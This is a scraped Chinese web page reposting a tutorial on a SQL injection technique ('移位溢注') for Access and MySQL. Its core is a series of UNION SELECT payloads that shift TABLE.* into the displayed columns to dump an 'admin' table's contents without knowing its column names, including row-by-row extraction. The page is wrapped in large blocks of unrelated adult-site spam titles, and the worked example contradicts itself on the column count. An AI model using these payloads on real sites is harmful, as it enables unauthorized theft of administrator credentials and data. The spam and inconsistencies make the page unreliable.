亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 開發 > 綜合 > 正文

移位溢注:告別依靠人品的偏移注入

2024-07-21 02:51:58
字體:
來源:轉載
供稿:網友

本文屬于i春秋原創文章現金獎勵計劃,未經允許嚴禁轉載。

介紹:

在access數據庫類型注入的時候,我們獲取不到列名(前提是有表名),一般會選擇使用偏移注入,但是這種注入方式往往借助的是個人的人品,且步驟繁瑣。本文中我們研究了一種新的注入技術讓“偏移注入不在需要人品”。在這里定義這種注入技術為:“移位溢注技術”。它適用于ACCESS和MySQL(任何版本)正文:我們先來看看普通的偏移注入步驟:1.判斷注入點2.order by 判斷長度3.判斷表名4.聯合查詢5.獲取表中列數:union select 1,2,3,4,..,* from TABLE6.開始偏移注入:TABLE as a inner join TABLE as b on a.id=b.id由于步驟6的方法過于需要人品值,且語句繁瑣,因此在這里,我們研究新的注入技術:首先來看看步驟6語句的整體意思:步驟6的語句,表示給TALBE取2個別名,然后分別用別名取查詢TALBE的內容(表a和表b);而on a.id = b.id 這樣的條件是為了滿足語法需求,實際并沒有作用,因為相同內容的表,相同字段內容一定相同。這時,我們再回過頭來看步驟5:由于聯合查詢中select后面添加數字的目的是為了讓聯合查詢返回接結果和網站正常查詢返回的結果的列數一致(不一致數據庫會報錯,頁面無法顯示),且*表示通配符,可以表示整個表格所有列;因此這里通過數字來占位,并使用*來替代TABLE中的所有列,使得聯合查詢可以完成,并推算出*的值。這時候我們繼續研究偏移注入的整體公式方法,發現即使使用多級偏移注入也需要一定的概率(人品值)才可以得到想要的結果,所以我們就嘗試研究新的方法能不能替換這種不固定概率的方法。現在我們重新整理一下SQL語句,從聯合查詢開始:1.原union語句:union select 1,2,3,..,p..,n from TABLE(p=頁面爆出的數字,可能有多個p1,p2..;n=原網站查詢的總列數;TALBE=我們獲得的表名;下面開始就使用上述字母的定義)2.新語句:union select 1,2,3,..,p-1,TABLE.*,p+k,..,n from TABLE where 字段名 = 字段內容  --在p的位置爆出TALBE表中第一個字段的內容(其他位置還可能爆出更多內容)(這里如果存在已知字段名可以使用,沒有就不用,一般id這個字段時存在的,可以使用id = 1來顯示第一行)union select 1,2,3,..,p-2,TABLE.*,p+k-1,..,n from TABLE where 字段名 = 字段內容--在p的位置爆出TALBE表中第二個字段的內容(其他位置還可能爆出更多內容)union select 1,2,3,..,p-3,TABLE.*,p+k-2,..,n from TABLE where 字段名 = 字段內容--在p的位置爆出TALBE表中第三個字段的內容(其他位置還可能爆出更多內容)注:這里一定是TALBE.*而不是*3.1 以此類推可以爆出TALBE的每一列內容。3.2 如果p<k則沒法爆出p+1列至k列的內容,如果n-p<k則無法爆出第1列至k-(n-p)列。原理:1.由原語句:union select 1,2,3,..,p..,n-k,* from TABLE 可以得出該聯合查詢的目的是構造和原網站相同列數的查詢結構,使得頁面上可以顯示對應的數字;這條語句相當于是做了兩次查詢并將它們的結果合并,第一次做了select 1,2,3,..,n-k from TALBE ,第二次做了select * from TALBE ,然后將它們的結果合并。這可以參考mysql的語句:select 1,2,3,4,5,admin.* from admin;2.只要滿足原理1的要求,保障聯合查詢的結果和原網站查詢的結果列數一致即可;因此可以將TALBE.*向前移動至頁面顯示的數字處來爆出TALBE列中的內容。這可以參考mysql的語句:select 1,2,3,4,5,6,7,8,9,10 from news where id =1 union select 1,2,3,4,5,6,7,admin.* from admin;select 1,2,3,4,5,6,7,8,9,10 from news where id =1 union select 1,2,3,admin.*,7,8,9,10 from admin;注:假設數字4、5在頁面顯示。由下圖可知,其實數據已近查詢出來,但是頁面沒有顯示,這個是通過平移查詢結果到頁面顯示的數字上去,即可爆出敏感字段。例子:步驟1:判斷注入點是否存在步驟2:判斷字段長度:order by 35 步驟3:獲得表名(必備條件)   and exists(select * from admin)步驟4:獲取不了列名(當嘗試多個常用字段名以后,最終還是發現無法獲得字段名)步驟5:使用聯合查詢(union select)步驟6:使用新注入技術方法(1)獲取admin表的列數:UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,* from admin                         --返回錯誤頁面UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,* from admin                              --返回錯誤頁面UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,* from admin                                    --返回錯誤頁面UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,* from admin                                          --返回錯誤頁面。。。UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,* from admin                                                    --返回步驟5頁面,因此admin表的列數為6(2)由于網頁中包含連續數字,表示可以顯示連續的查詢結果,構造SQL語句查詢前四列第一行。UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,admin.*,34,35 from admin(3)由第一行第一列內容為1,可以猜測該表有id字段,因此修改語句獲取其他行。UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,admin.*,34,35 from admin where id = 3總結

在這里我們命名這種新注入技術為"移位溢注"。由此如果MYSQL小于5.0的情況下所具備的條件和ACCESS一樣,也可以使用此方法注入,如果是MYSQL大于5.0的版本,使用此方法可以省去獲得列名的步驟。


發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
欧美性猛交xxxx免费看久久久| 久久激情视频免费观看| 亚洲大胆人体视频| 亚洲一区二区免费在线| 欧美性理论片在线观看片免费| 精品美女国产在线| 蜜臀久久99精品久久久无需会员| 精品国产成人在线| 欧亚精品在线观看| 成人免费黄色网| 中文字幕亚洲综合久久筱田步美| 国产在线视频不卡| 久久久精品国产网站| 一本色道久久88亚洲综合88| 国产一区视频在线播放| 亚洲美女在线观看| 精品视频在线播放色网色视频| 亚洲乱码一区av黑人高潮| 国产欧美欧洲在线观看| 中文字幕v亚洲ⅴv天堂| 97视频免费看| 少妇高潮 亚洲精品| 国产精品丝袜久久久久久不卡| 国产精品国产自产拍高清av水多| 亚洲最大的成人网| 97视频在线观看亚洲| 欧美刺激性大交免费视频| 97超碰蝌蚪网人人做人人爽| 亚洲天堂一区二区三区| 欧美精品日韩www.p站| 亚洲精品一区二区在线| 国产成人在线一区二区| 日韩精品在线观| 日韩在线视频线视频免费网站| 日韩电影中文字幕av| 色综合老司机第九色激情| 亚洲国产91色在线| 久久久久久久一区二区| 欧美性猛交xxxx富婆弯腰| 亚洲无限av看| 精品女同一区二区三区在线播放| 国产精品男人的天堂| 亚洲欧美精品伊人久久| 精品国产欧美一区二区三区成人| 成人妇女淫片aaaa视频| 性欧美视频videos6一9| 欧美自拍大量在线观看| 国产在线播放不卡| 亚洲欧美制服丝袜| 久久久午夜视频| 4k岛国日韩精品**专区| 欧美精品激情在线观看| 欧美亚洲免费电影| 亚洲最大av网站| 91精品国产高清久久久久久久久| 亚洲人成网在线播放| 97成人精品区在线播放| 久久青草精品视频免费观看| 日韩欧美在线一区| 亚洲精品国产精品国产自| 亚洲精品一区久久久久久| 欧美一区二区大胆人体摄影专业网站| 黑人巨大精品欧美一区免费视频| 91精品国产乱码久久久久久久久| 久久精品91久久香蕉加勒比| 国产欧美一区二区三区视频| 国产成人精品一区| 欧美高跟鞋交xxxxhd| 久久国产精品免费视频| 国产精品久久久久91| 欧美国产精品日韩| 91天堂在线观看| 国产精品欧美激情| 国产精品成熟老女人| 精品无人国产偷自产在线| 国产香蕉97碰碰久久人人| 欧美老女人bb| 91美女片黄在线观看游戏| 亚洲精品国产综合久久| 亚洲国产日韩欧美在线图片| 疯狂做受xxxx高潮欧美日本| 久久精品这里热有精品| 成人av番号网| 亚洲免费一级电影| 国产日产亚洲精品| 亚洲国产精品成人va在线观看| 国产网站欧美日韩免费精品在线观看| 亚洲午夜久久久影院| 国产精品电影在线观看| 欧美日韩亚洲激情| 欧美日韩福利视频| 91九色国产视频| 国产91色在线|免| 久久噜噜噜精品国产亚洲综合| 欧美激情欧美激情| 欧美巨大黑人极品精男| www.欧美精品| 91精品视频免费观看| 欧美俄罗斯乱妇| 亚洲欧美在线第一页| 91九色单男在线观看| 5278欧美一区二区三区| 中文亚洲视频在线| 伊人男人综合视频网| 日韩极品精品视频免费观看| 亚洲一区二区三区在线视频| 国产高清视频一区三区| 欧美日韩国产综合视频在线观看中文| 欧美色视频日本版| 国产精品成人播放| 精品久久久久久久久中文字幕| 久久久久久久久久久国产| 欧美电影在线免费观看网站| 91亚洲一区精品| 日韩成人网免费视频| 日韩av免费一区| 久久久爽爽爽美女图片| 国产精品丝袜视频| 欧美成人午夜激情| 成人精品一区二区三区电影免费| 88xx成人精品| 国产日韩换脸av一区在线观看| 亚洲的天堂在线中文字幕| 国产精品免费一区二区三区都可以| 国产精品视频一区二区三区四| 亚洲女人天堂网| 日韩电影中文字幕在线| 亚洲精品一区二区三区婷婷月| 欧美成年人在线观看| 成人精品久久久| 美日韩精品视频免费看| 日韩欧美中文第一页| 亚洲精品视频网上网址在线观看| 欧美午夜激情在线| 国产精品人人做人人爽| 色综合伊人色综合网站| 亚洲视频一区二区三区| 欧美日韩在线免费| 欧美有码在线观看| 久久精品99无色码中文字幕| 成人伊人精品色xxxx视频| 欧美激情一二区| 日韩成人激情视频| 少妇高潮久久77777| 日韩精品中文字幕有码专区| 精品成人国产在线观看男人呻吟| 日韩av大片在线| 国产欧美久久久久久| 亚洲欧美制服中文字幕| 91av视频在线| 欧美高清电影在线看| 欧美做爰性生交视频| 久久久久久久久网站| 亚洲一区二区福利| 精品少妇一区二区30p| 韩国国内大量揄拍精品视频| 欧美激情网友自拍| 一区二区三区国产视频| 欧美成人在线影院| 精品国产91久久久久久| 成人有码视频在线播放| 91精品国产综合久久香蕉的用户体验| 亚洲性日韩精品一区二区| 亚洲激情视频在线观看|